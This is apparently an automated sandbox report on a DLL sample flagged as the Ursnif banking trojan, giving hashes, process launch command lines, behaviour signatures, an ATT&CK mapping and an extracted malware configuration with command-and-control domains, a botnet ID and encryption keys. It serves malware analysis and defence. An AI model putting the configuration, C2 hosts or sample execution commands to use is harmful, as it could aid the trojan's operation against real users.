Play interactive tour

Edit tour

Analysis Report kZcCqvNtWa.dll

Overview

General Information

Sample Name:	kZcCqvNtWa.dll
Analysis ID:	412159
MD5:	b9b732dbc6f94c79b5767eb98ebd899a
SHA1:	984a3ba5d4fe06265ce23cec82bda6a63b2bb3bc
SHA256:	1a0d4b328438a72cee012f6387825d942463b896fadc13f2c17e8d005f510cd4
Tags:	dllGoziISFBUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Machine Learning detection for sample

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

PE file contains an invalid checksum

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 1956 cmdline: loaddll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 1720 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5788 cmdline: rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5820 cmdline: rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Eithernothing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2168 cmdline: rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Order MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6160 cmdline: rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Smileschool MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 1492 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5168 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1492 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "KujE77ctKyR8x3/dODwZbEsxGmck+FW9384s5u0Kacw8y1gCN+8m2bfjJPovkn+Uzufcdfss+a43eI6oHR1KgWQmvEAO6LK8tJv+Wl7iCBPJP7eef8xKeXht/Mhk1PSj7mHnJ9lcqKMtTteEdSecVvMRtb/WSKVTFfHDva9My7AJ/NbXqHdzCG7znACswLxD", "c2_domain": ["outlook.com/login", "gmail.com", "worunekulo.club", "horunekulo.website"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 1956	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 5.3.rundll32.exe.d2a427.0.raw.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "KujE77ctKyR8x3/dODwZbEsxGmck+FW9384s5u0Kacw8y1gCN+8m2bfjJPovkn+Uzufcdfss+a43eI6oHR1KgWQmvEAO6LK8tJv+Wl7iCBPJP7eef8xKeXht/Mhk1PSj7mHnJ9lcqKMtTteEdSecVvMRtb/WSKVTFfHDva9My7AJ/NbXqHdzCG7znACswLxD", "c2_domain": ["outlook.com/login", "gmail.com", "worunekulo.club", "horunekulo.website"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: kZcCqvNtWa.dll

ReversingLabs: Detection: 21%

Machine Learning detection for sample

Show sources

Source: kZcCqvNtWa.dll

Joe Sandbox ML: detected

Source: kZcCqvNtWa.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:

Binary string: c:\Tube-meet\585\straight\lift\38_Claim\Tail.pdb source: loaddll32.exe, 00000000.00000002.480778808.000000006E289000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.479153934.000000006E289000.00000002.00020000.sdmp, kZcCqvNtWa.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_001D4C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

0_2_001D4C3B

Source: unknown

DNS traffic detected: queries for: outlook.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 1956, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 1956, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E241F14 NtMapViewOfSection,	0_2_6E241F14
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2415F1 GetProcAddress,NtCreateSection,memset,	0_2_6E2415F1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2423A5 NtQueryVirtualMemory,	0_2_6E2423A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_001D1168 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_001D1168
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_001DB2F1 NtQueryVirtualMemory,	0_2_001DB2F1

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E242184	0_2_6E242184
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_001DB0CC	0_2_001DB0CC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_001D696A	0_2_001D696A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_001D1B6A	0_2_001D1B6A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E278960	0_2_6E278960
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E282153	0_2_6E282153
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E278960	3_2_6E278960
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E282153	3_2_6E282153

Source: kZcCqvNtWa.dll

Binary or memory string: OriginalFilenameTail.dll0 vs kZcCqvNtWa.dll

Source: kZcCqvNtWa.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: kZcCqvNtWa.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal76.troj.winDLL@14/4@3/0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_001D7F56 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_001D7F56

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFE4F68CE1A440F339.TMP

Jump to behavior

Source: kZcCqvNtWa.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Eithernothing

Source: kZcCqvNtWa.dll

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Eithernothing
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Order
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Smileschool
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1492 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Eithernothing	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Order	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Smileschool	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1492 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: kZcCqvNtWa.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kZcCqvNtWa.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kZcCqvNtWa.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kZcCqvNtWa.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kZcCqvNtWa.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kZcCqvNtWa.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: kZcCqvNtWa.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: kZcCqvNtWa.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: kZcCqvNtWa.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: kZcCqvNtWa.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: kZcCqvNtWa.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: kZcCqvNtWa.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E2417FA LoadLibraryA,GetProcAddress,

0_2_6E2417FA

Source: kZcCqvNtWa.dll

Static PE information: real checksum: 0x84de2 should be: 0x8037c

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E242120 push ecx; ret	0_2_6E242129
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E242173 push ecx; ret	0_2_6E242183
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_001DB0BB push ecx; ret	0_2_001DB0CB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_001DAD00 push ecx; ret	0_2_001DAD09
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E282761 push ecx; ret	0_2_6E282774
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E254348 push ss; ret	0_2_6E25434B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E25778D pushfd ; ret	0_2_6E2577AB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E252F9A push edi; retf	0_2_6E252FA4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E252C15 push ebp; retf	0_2_6E252C16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E282761 push ecx; ret	3_2_6E282774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E254348 push ss; ret	3_2_6E25434B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E25778D pushfd ; ret	3_2_6E2577AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E252F9A push edi; retf	3_2_6E252FA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E252C15 push ebp; retf	3_2_6E252C16

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 1956, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

0_2_001D4C3B

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E28636F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_6E28636F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E2417FA LoadLibraryA,GetProcAddress,

0_2_6E2417FA

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2B5770 mov eax, dword ptr fs:[00000030h]	0_2_6E2B5770
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2B56A6 mov eax, dword ptr fs:[00000030h]	0_2_6E2B56A6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2B52AD push dword ptr fs:[00000030h]	0_2_6E2B52AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E2B5770 mov eax, dword ptr fs:[00000030h]	3_2_6E2B5770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E2B56A6 mov eax, dword ptr fs:[00000030h]	3_2_6E2B56A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E2B52AD push dword ptr fs:[00000030h]	3_2_6E2B52AD

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E282F08 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E282F08
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E28636F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E28636F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E28150C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E28150C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E282F08 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E282F08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E28636F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6E28636F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E28150C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6E28150C

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.476337684.0000000001240000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.477553156.0000000003910000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.476337684.0000000001240000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.477553156.0000000003910000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.476337684.0000000001240000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.477553156.0000000003910000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.476337684.0000000001240000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.477553156.0000000003910000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_001D2D6E cpuid

0_2_001D2D6E

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,		0_2_6E287660
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,		3_2_6E287660

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E241237 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_6E241237

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_001D2D6E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_001D2D6E

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E241CDD CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6E241CDD

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 1956, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 1956, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery23	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
kZcCqvNtWa.dll	21%	ReversingLabs	Win32.Trojan.Zusy
kZcCqvNtWa.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.loaddll32.exe.1d0000.0.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
outlook.com	40.97.153.146	true	false	high
HHN-efz.ms-acdc.office.com	52.98.171.226	true	false	high
www.outlook.com	unknown	unknown	false	high
outlook.office365.com	unknown	unknown	false	high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	412159
Start date:	12.05.2021
Start time:	13:00:39
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	kZcCqvNtWa.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.winDLL@14/4@3/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 20.6% (good quality ratio 19.9%) Quality average: 81% Quality standard deviation: 27%
HCA Information:	Successful, ratio: 73% Number of executed functions: 44 Number of non-executed functions: 59
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HHN-efz.ms-acdc.office.com	A5uTdwOwJ1.dll	Get hash	malicious	Browse	40.101.138.210
	FuiZSHt8Hx.dll	Get hash	malicious	Browse	52.98.151.242
	609a460e94791.tiff.dll	Get hash	malicious	Browse	52.97.201.34
	iJdlvBxhYu.dll	Get hash	malicious	Browse	52.97.150.2
	8OKQ6ogGRx.dll	Get hash	malicious	Browse	40.101.138.2
	609110f2d14a6.dll	Get hash	malicious	Browse	40.101.137.34
	New%20order%20contract.html	Get hash	malicious	Browse	52.98.175.2
outlook.com	A1qhcbngFV.exe	Get hash	malicious	Browse	104.47.54.36
	file.msg.exe	Get hash	malicious	Browse	104.47.56.138
	Update-KB1484-x86.exe	Get hash	malicious	Browse	104.47.57.138
	n6osajjc938.exe	Get hash	malicious	Browse	104.47.54.36
	9b3d7f02.exe	Get hash	malicious	Browse	104.47.54.36
	5zc9vbGBo3.exe	Get hash	malicious	Browse	52.101.24.0
	InnAcjnAmG.exe	Get hash	malicious	Browse	104.47.53.36
	8X93Tzvd7V.exe	Get hash	malicious	Browse	52.101.24.0
	u8A8Qy5S7O.exe	Get hash	malicious	Browse	104.47.53.36
	SecuriteInfo.com.Mal.GandCrypt-A.24654.exe	Get hash	malicious	Browse	104.47.54.36
	SecuriteInfo.com.Mal.GandCrypt-A.5674.exe	Get hash	malicious	Browse	104.47.54.36
	SecuriteInfo.com.W32.AIDetect.malware2.29567.exe	Get hash	malicious	Browse	104.47.53.36
	lsass(1).exe	Get hash	malicious	Browse	104.47.59.138

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{20078DE0-B35D-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.7704690064419406
Encrypted:	false
SSDEEP:	48:IwBGcprEGwpLWG/ap8wGIpcVdGvnZpvVyGoSqp9VKGo49pmV:r3Z8ZU2gWV6tV8fVd9MV
MD5:	13E47D90BC1C1D71FB960BD7DBF91099
SHA1:	17385913779143F5D7281C96EAFF4EA46F7A563A
SHA-256:	0E0755C66FE657EF520818206045A6C0D2DD547A64BEBF294700E20579CD3980
SHA-512:	2CD7DFA4FA6918CCAD344592A477369BB5EBF312E5EEF21193C252F06D7A0B303CF6582FA5D9966B9634197D3BDA3BAABD7DD6A6435057C31CF2CD1B67CE3720
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

